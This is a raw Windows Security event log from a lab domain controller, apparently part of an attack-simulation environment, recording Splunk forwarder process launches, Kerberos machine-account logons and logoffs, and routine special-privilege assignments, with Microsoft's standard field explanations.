04/19/2021 02:06:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263480
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x2dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:06:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263481
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:06:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263483
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x199c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:06:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263482
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:06:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263487
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x710BCB
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:06:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263486
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x710BCB
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59757
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:06:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263485
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x710BCB
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:07:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263488
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x186c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:07:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263490
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:07:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263489
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x450
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:07:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263491
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:07:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263493
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x71284E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59763
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:07:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263492
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x71284E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:07:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263494
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:07:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263496
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:07:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263495
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263502
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x713E6B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263501
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x713E6B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59767
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263500
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x713E6B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263499
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x713DFF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263498
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x713DFF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59766
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263497
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x713DFF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:07:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263505
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x714C56
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:07:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263504
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x714C56
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59776
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
